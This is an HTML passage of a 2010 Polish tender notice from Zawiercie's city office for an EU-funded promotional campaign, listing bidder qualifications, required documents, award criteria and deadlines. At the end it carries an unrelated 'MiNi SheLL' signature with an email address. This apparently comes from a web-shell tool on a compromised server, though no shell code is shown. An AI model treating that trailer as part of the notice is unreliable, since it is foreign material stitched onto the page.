<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonali z należytą starannością co najmniej 3 usługi polegające na przygotowaniu i przeprowadzeniu kampanii promocyjnej w obszarze marketingu terytorialnego, o wartości każdej z nich minimum 300.000,00 zł brutto w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;
Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, tj.:
a.	kierownikiem zespołu - posiadającym minimum 3 lata doświadczenia w zakresie reklamy, promocji i marketingu, który kierował przygotowaniem i realizacją co najmniej 2 kampanii promocyjnych, o wartości każdej z nich  minimum 300.000 zł brutto,
b.	2 członkami zespołu ds. kreacji - z których każda posiada minimum 2 lata doświadczenia w branży agencji reklamowych, którzy brali udział w przygotowaniu i realizacji co najmniej 2 kampanii promocyjnych, o wartości każdej z nich minimum 300.000 zł brutto,
c.	1 członkiem zespołu ds. DTP - posiadającym minimum 3 lata doświadczenia w zakresie projektowania i składzie DTP, który wykonał i zaprojektował projekty co najmniej 2 kampanii promocyjnych, o wartości każdej z nich minimum 300.000 zł brutto.
Zamawiający nie dopuszcza, aby funkcję kierownika zespołu oraz członka zespołu  pełniła jedna i ta sama osoba.
Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 5 do  specyfikacji.
2)	Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, złożony na druku stanowiącym załącznik nr 6 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu).
3)	Projekt stoiska targowego wraz z opisem jego wyposażenia, oferowaną powierzchnią, technologią wykonania (zadanie I).
4)	Koncepcję (szkic, rysunek, projekt graficzny) makiety architektonicznej wraz z opisem technologii wykonania (zadanie I).
5)	Oferowaną ilości zaproszeń jakie zostaną rozesłane do potencjalnych inwestorów (zadanie I).
6)	Projekt strony startowej, strony głównej oraz podstrony prezentacji multimedialnej wraz z opisem proponowanej zawartości oraz technologii wykonania (zadanie II).
7)	Scenariusz (storyboard) filmu promocyjnego wraz z opisem zastosowanych efektów, muzyki, narracji (zadanie II).
8)	Scenariusz (storyboard) spotów reklamowych wraz z opisem zastosowanych efektów, muzyki, narracji (zadanie II).
9)	Koncepcję przestrzenną zagospodarowania terenów inwestycyjnych (szkic, rysunek, projekt graficzny) wraz z opisem technologii wykonania projektu oraz zakresu (zadanie II).
10)	Projekty graficzne materiałów poligraficznych wraz z opisem technologii wykonania (zadanie II): 
-	płyty CD/DVD,
-	okładki na płytę,
-	wkładki do płyty,
-	ulotki o mieście.
11)	Projekty graficzne materiałów poligraficznych wraz z opisem technologii wykonania (zadanie III):  
-	teczki ofertowej,
-	folderu inwestycyjnego,
-	wkładki do folderu,
12)	Propozycję gadżetów wraz z opisem (materiał, gramatura, wielkość, oferowana ilość, rodzaj nadruku, kolory, etc.) - (zadanie III):
i.	torby ekologiczne,
ii.	koszulki bawełnianie,
iii.	etui,
iv.	parasole,
v.	pendrivy,
vi.	kryształowe amonitki.
13)	Projekt graficzny okładki i strony wewnętrznej wraz z opisem technologii wykonania (czcionka, oferowana ilość i formaty zdjęć, introligatornia, rodzaj okładki, etc) albumu o mieście (zadanie IV).
14)	Projekt graficzny bilbordu (zadanie V).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 55</li>
<li>2 - Kreacja i koncepcja kampanii - 45</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany treści umowy mogą wynikać ze zmian regulacji prawnych obowiązujących w dniu podpisania umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2  42-400 Zawiercie,  Wydział Zamówień Publicznych, pokój nr 202.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2010 godzina 09:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2
Punkt Informacyjny (parter UM).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wymagany termin realizacji zamówienia: od dnia podpisania umowy do dnia 25.11.2010 r. zgodnie z poniższym harmonogramem:
Zadanie I do 25 listopada 2010 r.
Zadanie II do 20 września 2010 r.
Zadanie II do 31 sierpnia 2010 r.
Zadanie IV do 30 września 2010 r.
Zadanie V do 31 października 2010 r.
Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013
Ogłoszenie o zamówieniu zostało zamieszczone w BZP w dniu 09/07/2010.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com